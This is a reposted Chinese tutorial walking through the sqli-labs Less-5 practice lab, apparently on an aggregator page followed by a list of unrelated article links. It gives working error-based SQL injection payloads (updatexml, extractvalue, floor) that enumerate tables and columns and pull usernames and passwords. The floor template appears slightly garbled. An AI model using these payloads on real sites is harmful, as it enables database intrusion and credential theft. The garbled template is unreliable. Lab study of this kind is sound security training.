sql 注入 之sqli-labs/less-5 双注入,也称:报错注入

该关卡返回正确或者错误页面,还有错误的代码,所以可以使用报错注入。报错注入的方式:

updatexml 函数注入:

mysql5.1.5 版本以上支持该函数,返回数据限制32位

模板:select * from user where id=1 and (updatexml("任意字符", concat(0x7e,(select database()),0x7e),"任意字符"))  ;  0x7e 可以换成其他符号用来充当间隔符,比如"~","*" 等

payload:

id=1 ' and (updatexml(1,concat(0x7e,(select database()),0x7e),1)) --+

extractvalue 函数注入:

mysql 5.1.5 版本以上才支持该函数,返回数据限制为32 位,可以使用substring 函数进行数据位移偏转

模板:select * from user where id =1 and (extractvalue(1,concat(0x7e,(select database()),0x7e)));

payload:

id=1' and ( extractvalue(1, concat (0x7e,(select database()),"*")))--+

floor 函数注入:

只能用concat连接,不能用group_concat,每次只能显示一条数据,

count : 查询数量 rand : 随机产生0-1 之间的数,floor :向下取整,group_by:按照指定字段分类

模板:

select * from user where id =1 and ( select 1 from ( select count(), concat(user(),floor(rand(0)2)) x from information_schema.table group_by x  )a )

payload:

正确页面:

错误页面:

输入单引号试探,发现页面会把sql报错语句显示在页面:

报错注入

查找数据库payload:

?id=1%27%20and%20(updatexml%20(1,%20concat(%200x7e,(select%20database()),%27~%27),1))%20--+

查找表:

id=1%27%20and%20(%20extractvalue(1,%20concat%20(0x7e,(select%20%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()),"*")))--+

查找列名:返回结果超过1 行

?id=1%27%20and%20(%20extractvalue(1,%20concat%20(0x7e,(select%20%20column_name%20from%20information_schema.columns%20where%20table_name=%27users%27)%20,"*")))%20--+

payload 改为:每次只显示一行

1' and ( extractvalue(1, concat (0x7e,(select column_name from information_schema.columns where table_name='users' limit 0,1),"*")))--+

limit 0,1 limit 1,1 limit 5,1 分别查出字段名

查找字段内容:

payload :

1%27%20and%20(%20extractvalue(1,%20concat%20(0x7e,(select%20username%20from%20users%20),"*")))--+

0x3c,0x68,0x72,0x2f,0x3e : 换行符

不能一次显示所有内容,所以分次查询:

id=1%27%20and%20(%20extractvalue(1,%20concat%20(0x7e,(select%20concat(username,":",password)%20from%20users%20limit%203,1),"*")))--+

用limit 0,1  limit n,1 来查看具体内容

1' and ( extractvalue(1, concat (0x7e,(select username from users),"*")))--+

1' and ( extractvalue(1, concat (0x7e,(select  username from users limit 0,1),"*")))--+

1' and ( extractvalue(1, concat (0x7e,(select  username from users where database='security'),"*")))--+

1' and ( extractvalue(1, concat (0x7e,(select username from users limit 0,1),"*")))--+

1' and ( extractvalue(1, concat (0x7e,(select  group_concat(username) from users  ),"*")))--+

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mfbz.cn/a/426059.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

Java入门

Java入门

文章目录 Java SEprivate、protect、default的区别this的用法继承extends及覆盖重写Overridesuper的用法接口interface及implementsstatic的用法static修饰成员变量static 修饰成员方法 多态向上转型和向下转型instanceof用法接口可作为方法的参数final的用法导包import内部类和…
阅读更多...
如何提升计算机性能

如何提升计算机性能

04 穿越功耗墙,我们该从哪些方面提升“性能”? 上一讲,在讲 CPU 的性能时,我们提到了这样一个公式: 程序的 CPU 执行时间 指令数CPIClock Cycle Time 这么来看,如果要提升计算机的性能,我们可以…
阅读更多...
无极低码:无极低码部署版操作指南

无极低码:无极低码部署版操作指南

无极低码 :https://wheart.cn 无极低码是一个面向开发者的工具,旨在为开发者、创业者或研发企业,提供快速,高效,标准化,可定制,私有化部署的平台,在兼顾开发速度的同时,兼…
阅读更多...
令马斯克眼红到起诉的GPT4到底是什么?

令马斯克眼红到起诉的GPT4到底是什么?

令马斯克眼红到起诉的GPT-4到底是什么? 在人工智能(AI)的发展历程中,GPT-4的问世无疑是一大里程碑。 但就在这项技术引领AI行业走向新高度之时,特斯拉CEO埃隆马斯克因与OpenAI及其CEO萨姆奥尔特曼等人在合同协议上的…
阅读更多...
【RT-Thread应用笔记】英飞凌PSoC 62 + CYW43012 WiFi延迟和带宽测试

【RT-Thread应用笔记】英飞凌PSoC 62 + CYW43012 WiFi延迟和带宽测试

文章目录 一、安装SDK二、创建项目三、编译下载3.1 编译代码3.2 下载程序 四、WiFi测试4.1 扫描测试4.2 连接测试 五、延迟测试5.1 ping百度5.2 ping路由器 六、带宽测试6.1 添加netutils软件包6.2 iperf命令参数6.3 PC端的iperf6.4 iperf测试准备工作6.5 进行iperf带宽测试6.6…
阅读更多...
【ESP32 IDF】key按键与EXTI中断

【ESP32 IDF】key按键与EXTI中断

文章目录 前言一、按键的使用1.1 按键的简介1.2 读取按键的高低电平1.3 读取按键具体代码 二、中断二、EXIT外部中断2.1 EXIT外部中断简介2.2 外部中断基础知识2.3 设置外部中断注册外部中断服务函数设置触发方式添加中断函数 2.4 示例代码 总结 前言 在嵌入式系统开发中&…
阅读更多...
OJ:用栈实现队列

OJ:用栈实现队列

232. 用栈实现队列 - 力扣(LeetCode) 总体思路 思路:由于C语言阶段没有相对应的栈库,所以我们需要手搓一个栈,再在此基础上来实现这道题,题目所由多个接口函数所构成 ,在开始写代码前&#xf…
阅读更多...
YOLOv9独家原创改进|使用DySample超级轻量的动态上采样算子

YOLOv9独家原创改进|使用DySample超级轻量的动态上采样算子

专栏介绍:YOLOv9改进系列 | 包含深度学习最新创新,主力高效涨点!!! 一、DySample论文摘要 尽管最近的基于内核的动态上采样器如CARAFE、FADE和SAPA取得了令人印象深刻的性能提升,但它们引入了大量的工作量&…
阅读更多...
实时抓取SKU商品属性详细信息API数据接口(淘宝,某音)

实时抓取SKU商品属性详细信息API数据接口(淘宝,某音)

item_sku-获取sku详细信息 taobao.item_sku详细信息 API公共参数 请求地址: https://api-gw.onebound.cn/taobao/item_sku 名称类型必须描述keyString是调用key(演示示例)secretString是调用密钥api_nameString是API接口名称(包括在请求地…
阅读更多...
芯来科技发布最新NI系列内核,NI900矢量宽度可达512/1024位

芯来科技发布最新NI系列内核,NI900矢量宽度可达512/1024位

参考:芯来科技发布最新NI系列内核,NI900矢量宽度可达512/1024位 (qq.com) 本土RISC-V CPU IP领军企业——芯来科技正式发布首款针对人工智能应用的专用处理器产品线Nuclei Intelligence(NI)系列,以及NI系列的第一款AI专用RISC-V处理器CPU IP…
阅读更多...
机器人 标准DH与改进DH

机器人 标准DH与改进DH

文章目录 1 建立机器人坐标系1.1 连杆编号1.2 关节编号1.3 坐标系方向2 标准DH(STD)2.1 确定X轴方向2.2 建模步骤2.3 变换顺序2.4 变换矩阵3 改进DH(MDH)3.1 确定X轴方向3.2 建模步骤3.3 变换顺序3.4 变换矩阵4 标准DH与改进DH区别5 Matlab示例参考链接1 建立机器人坐标系 1.1…
阅读更多...
现代化数据架构升级:毫末智行自动驾驶如何应对年增20PB的数据规模挑战?-OceanBase案例

现代化数据架构升级:毫末智行自动驾驶如何应对年增20PB的数据规模挑战?-OceanBase案例

毫末智行是一家致力于自动驾驶的人工智能技术公司,其前身是长城汽车智能驾驶前瞻分部,以零事故、零拥堵、自由出行和高效物流为目标,助力合作伙伴重塑和全面升级整个社会的出行及物流方式。 在自动驾驶领域中,是什么原因让毫末智行…
阅读更多...
边缘智能网关:让环境监测更智能

边缘智能网关:让环境监测更智能

在环境监测领域,边缘智能网关可用于区域环境的实时监测、分析和预警,例如河湖水位监测、雨雪监测、风沙/风速监测,通过实时采集并分析环境变化数据,能够有助于对于突发、急发的各种自然灾害进行快速预警和应对。 一、边缘智能网关…
阅读更多...
Docker 创建容器并指定时区

Docker 创建容器并指定时区

目录 1. 通过环境变量设置时区(推荐)2. 挂载宿主机的时区文件到容器中3. 总结 要在 Docker 容器中指定时区,可以通过两种方式来实现: 1. 通过环境变量设置时区(推荐) 在 Docker 运行时,可以通…
阅读更多...
Unity UI实现表格渲染

Unity UI实现表格渲染

前言 最近有在用Unity做前端UI, 用到了实现表格数据渲染,也就是后台给的list渲染到表格中,查看了许多资料发现比较少,因此在这里记录一下吧,希望可以帮助到大家哦。 也是第一次使用Unity,先简单介绍一下&…
阅读更多...
类构造完成,Bean注入之后执行方法

类构造完成,Bean注入之后执行方法

PostConstruct 容器执行之后执行 PreDestory 在容器销毁之前执行
阅读更多...
redis进阶(一)

redis进阶(一)

文章目录 前言一、Redis中的对象的结构体如下:二、压缩链表三、跳跃表 前言 Redis是一种key/value型数据库,其中,每个key和value都是使用对象表示的。 一、Redis中的对象的结构体如下: /** Redis 对象*/ typedef struct redisO…
阅读更多...
今日arXiv最热大模型论文:谷歌最新研究,将LLM用于回归分析任务,显著超越传统模型

今日arXiv最热大模型论文:谷歌最新研究,将LLM用于回归分析任务,显著超越传统模型

回归分析是一个强大的工具,能够准确预测系统或模型的结果指标,给定一组参数。然而,传统上这些方法仅适用于特定任务。本文研究者提出了OMNIPRED框架,这是一个训练语言模型作为通用端到端回归器的框架,它可以处理来自多…
阅读更多...
SNAP:如何批量预处理Sentinel2 L2A数据集并输出为TIFF文件?

SNAP:如何批量预处理Sentinel2 L2A数据集并输出为TIFF文件?

我的需求 我目前就是希望下载哨兵2号数据,然后在SNAP中进行批量提取真彩色波段并输出为TIFF文件。 数据集下载说明 目前哨兵网站似乎进行了一大波更新,连网站都换了,网址如下: https://dataspace.copernicus.eu/ 打开后界面如…
阅读更多...
五千字 DDL、DML、DQL、DCL 超详解

五千字 DDL、DML、DQL、DCL 超详解

SQL语句,根据其功能,主要分为四类:DDL、DML、DQL、DCL。 DDL (Data Definition Language) 数据定义语言,用来定义数据库对象(数据库,表, 字段) DML (Data Manipulation Languag) 数据操作语言,…
阅读更多...
最新文章

Copyright @ 2022~2023

友情链接: 我的编程经验分享 一条长河网 尧图网站开发 尧图建网站